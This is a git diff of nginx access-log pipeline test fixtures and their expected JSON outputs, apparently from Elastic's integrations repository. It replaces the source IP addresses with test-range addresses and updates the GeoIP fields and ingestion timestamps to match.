"source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/", @@ -304,7 +232,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -320,8 +248,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246689800Z", - "original": "77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653079800Z", + "original": "67.43.156.13 - - [07/Dec/2016:10:34:43 +0100] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -350,31 +278,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/favicon.ico", @@ -391,7 +301,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -408,8 +318,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246697200Z", - "original": "77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653088800Z", + "original": "67.43.156.13 - - [07/Dec/2016:10:34:43 +0100] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -438,31 +348,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/test", @@ -478,7 +370,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -494,8 +386,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246704Z", - "original": "77.179.66.156 - - [07/Dec/2016:10:43:18 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653098400Z", + "original": "67.43.156.13 - - [07/Dec/2016:10:43:18 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -524,31 +416,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/test", @@ -564,7 +438,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -580,8 +454,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246711400Z", - "original": "77.179.66.156 - - [07/Dec/2016:10:43:21 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653105800Z", + "original": "67.43.156.13 - - [07/Dec/2016:10:43:21 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -610,31 +484,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/test1", @@ -650,7 +506,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -666,8 +522,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246717900Z", - "original": "77.179.66.156 - - [07/Dec/2016:10:43:23 +0100] \"GET /test1 HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653111900Z", + "original": "67.43.156.13 - - [07/Dec/2016:10:43:23 +0100] \"GET /test1 HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -734,7 +590,7 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246724400Z", + "ingested": "2021-12-09T13:41:40.653118Z", "original": "127.0.0.1 - - [07/Dec/2016:11:04:37 +0100] \"GET /test1 HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -802,7 +658,7 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246753600Z", + "ingested": "2021-12-09T13:41:40.653124800Z", "original": "127.0.0.1 - - [07/Dec/2016:11:04:58 +0100] \"GET / HTTP/1.1\" 304 0 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -870,7 +726,7 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246764800Z", + "ingested": "2021-12-09T13:41:40.653133100Z", "original": "127.0.0.1 - - [07/Dec/2016:11:04:59 +0100] \"GET / HTTP/1.1\" 304 0 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -938,7 +794,7 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246772900Z", + "ingested": "2021-12-09T13:41:40.653141500Z", "original": "127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] \"GET /taga HTTP/1.1\" 404 169 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nlessons.example.com 192.168.0.1 - - [09/Jun/2020:12:10:39 -0700] \"GET /A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4 HTTP/1.1\" 206 7648063 \"http://lessons.example.com/A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4\" \"Mozilla/5.0 (Linux; Android 5.1.1; KFFOWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/81.2.16 like Chrome/81.0.4044.138 Safari/537.36\"\nlessons.example.com 192.168.0.1 - - [09/Jun/2020:12:15:39 -0700] \"GET /%D0%A0%D1%83%D1%81%D1%81%D0%BA%D0%B0%D1%8F%20%D1%88%D0%BA%D0%BE%D0%BB%D0%B0%20-%20InternetUrok%201%D0%BA%D0%BB%D0%B0%D1%81%D1%81/ HTTP/1.1\" 206 7648063 \"http://lessons.example.com/A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4\" \"Mozilla/5.0 (Linux; Android 5.1.1; KFFOWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/81.2.16 like Chrome/81.0.4044.138 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log b/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log index 50781d9d7aa..08310b13e22 100644 --- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log +++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log @@ -1,9 +1,9 @@ 10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" 172.17.0.1 - - [29/May/2017:19:02:48 +0000] "GET /stringpatch HTTP/1.1" 404 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-" -10.0.0.2, 10.0.0.1, 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" -85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36" +10.0.0.2, 10.0.0.1, 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" +67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36" "10.5.102.222, 199.96.1.1, 204.246.1.1" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] "GET /assets/xxxx?q=100 HTTP/1.1" 200 25507 "-" "Amazon CloudFront" -2a03:0000:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] "GET /test.html HTTP/1.1" 404 8571 "-" "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)" +2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] "GET /test.html HTTP/1.1" 404 8571 "-" "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)" 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] "" 400 0 "-" "-" unix: - - [26/Feb/2019:15:39:42 +0100] "hello" 400 173 "-" "-" localhost - - [29/May/2017:19:02:48 +0000] "GET /test2 HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-" diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json b/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json index 2b40acbfc82..6c162949a28 100644 --- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json +++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json @@ -44,7 +44,7 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.619833200Z", + "ingested": "2021-12-09T13:41:42.512992900Z", "original": "10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -112,7 +112,7 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.619849400Z", + "ingested": "2021-12-09T13:41:42.513002400Z", "original": "172.17.0.1 - - [29/May/2017:19:02:48 +0000] \"GET /stringpatch HTTP/1.1\" 404 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -144,31 +144,13 @@ "remote_ip_list": [ "10.0.0.2", "10.0.0.1", - "85.181.35.98" + "67.43.156.14" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-BE", - "city_name": "Berlin", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Land Berlin", - "location": { - "lon": 13.4531, - "lat": 52.4473 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "85.181.35.98", - "ip": "85.181.35.98" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "path": "/ocelot", @@ -184,7 +166,7 @@ "_tmp": {}, "related": { "ip": [ - "85.181.35.98" + "67.43.156.14" ] }, "http": { @@ -200,8 +182,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.619855Z", - "original": "10.0.0.2, 10.0.0.1, 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", + "ingested": "2021-12-09T13:41:42.513008900Z", + "original": "10.0.0.2, 10.0.0.1, 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -230,31 +212,13 @@ "nginx": { "access": { "remote_ip_list": [ - "85.181.35.98" + "67.43.156.14" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-BE", - "city_name": "Berlin", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Land Berlin", - "location": { - "lon": 13.4531, - "lat": 52.4473 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "85.181.35.98", - "ip": "85.181.35.98" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "path": "/ocelot", @@ -270,7 +234,7 @@ "_tmp": {}, "related": { "ip": [ - "85.181.35.98" + "67.43.156.14" ] }, "http": { @@ -286,8 +250,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.619859500Z", - "original": "85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"\n\"10.5.102.222, 199.96.1.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"\n2a03:0000:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"", + "ingested": "2021-12-09T13:41:42.513013400Z", + "original": "67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"\n\"10.5.102.222, 199.96.1.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"\n2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -342,7 +306,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-06-09T13:15:11.619863500Z", + "ingested": "2021-12-09T13:41:42.513018600Z", "original": "127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] \"\" 400 0 \"-\" \"-\"\nunix: - - [26/Feb/2019:15:39:42 +0100] \"hello\" 400 173 \"-\" \"-\"\nlocalhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nlocalhost, localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\n", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log b/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log index 0706028b6a0..be64f1d3bcd 100644 --- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log +++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log @@ -1,10 +1,10 @@ example.com 10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" example.com 172.17.0.1 - - [29/May/2017:19:02:48 +0000] "GET /stringpatch HTTP/1.1" 404 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-" -example.com 10.0.0.2, 10.0.0.1, 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" -example.com:80 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36" +example.com 10.0.0.2, 10.0.0.1, 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" +example.com:80 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36" example.com:80 "10.5.102.222, 199.96.1.1, 204.246.1.1" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] "GET /assets/xxxx?q=100 HTTP/1.1" 200 25507 "-" "Amazon CloudFront" -1.2.3.4 2a03:0000:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] "GET /test.html HTTP/1.1" 404 8571 "-" "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)" -1.2.3.4:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] "" 400 0 "-" "-" +67.43.156.15 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] "GET /test.html HTTP/1.1" 404 8571 "-" "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)" +67.43.156.15:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] "" 400 0 "-" "-" example.com:80 unix: - - [26/Feb/2019:15:39:42 +0100] "hello" 400 173 "-" "-" -1.2.3.4 localhost - - [29/May/2017:19:02:48 +0000] "GET /test2 HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-" +67.43.156.15 localhost - - [29/May/2017:19:02:48 +0000] "GET /test2 HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-" example.com localhost, localhost - - [29/May/2017:19:02:48 +0000] "GET /test2 HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-" diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json b/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json index 023c4583f95..208427cae38 100644 --- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json +++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json @@ -48,8 +48,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.704779700Z", - "original": "example.com 10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nexample.com 172.17.0.1 - - [29/May/2017:19:02:48 +0000] \"GET /stringpatch HTTP/1.1\" 404 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nexample.com 10.0.0.2, 10.0.0.1, 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nexample.com:80 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"\nexample.com:80 \"10.5.102.222, 199.96.1.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"", + "ingested": "2021-12-09T13:41:43.172715Z", + "original": "example.com 10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nexample.com 172.17.0.1 - - [29/May/2017:19:02:48 +0000] \"GET /stringpatch HTTP/1.1\" 404 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nexample.com 10.0.0.2, 10.0.0.1, 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nexample.com:80 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"\nexample.com:80 \"10.5.102.222, 199.96.1.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -78,27 +78,33 @@ "nginx": { "access": { "remote_ip_list": [ - "2a03:0000:10ff:f00f:0000:0000:0:8000", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "10.225.192.17", "10.2.2.121" ] } }, "destination": { - "ip": "1.2.3.4" + "ip": "67.43.156.15" }, "source": { "geo": { "continent_name": "Europe", - "country_name": "Portugal", + "country_name": "Denmark", "location": { - "lon": -8.0, - "lat": 39.5 + "lon": 10.0, + "lat": 56.0 }, - "country_iso_code": "PT" + "country_iso_code": "DK" }, - "address": "2a03:0000:10ff:f00f:0000:0000:0:8000", - "ip": "2a03:0000:10ff:f00f:0000:0000:0:8000" + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "path": "/test.html", @@ -115,8 +121,8 @@ "_tmp": {}, "related": { "ip": [ - "2a03:0000:10ff:f00f:0000:0000:0:8000", - "1.2.3.4" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "67.43.156.15" ] }, "http": { @@ -132,8 +138,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.704800200Z", - "original": "1.2.3.4 2a03:0000:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"", + "ingested": "2021-12-09T13:41:43.172728700Z", + "original": "67.43.156.15 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -168,12 +174,12 @@ "related": { "ip": [ "127.0.0.1", - "1.2.3.4" + "67.43.156.15" ] }, "destination": { "port": 80, - "ip": "1.2.3.4" + "ip": "67.43.156.15" }, "http": { "response": { @@ -188,8 +194,8 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-06-09T13:15:11.704805400Z", - "original": "1.2.3.4:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] \"\" 400 0 \"-\" \"-\"\nexample.com:80 unix: - - [26/Feb/2019:15:39:42 +0100] \"hello\" 400 173 \"-\" \"-\"", + "ingested": "2021-12-09T13:41:43.172732700Z", + "original": "67.43.156.15:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] \"\" 400 0 \"-\" \"-\"\nexample.com:80 unix: - - [26/Feb/2019:15:39:42 +0100] \"hello\" 400 173 \"-\" \"-\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -213,7 +219,7 @@ } }, "destination": { - "ip": "1.2.3.4" + "ip": "67.43.156.15" }, "source": { "address": "localhost" @@ -232,7 +238,7 @@ 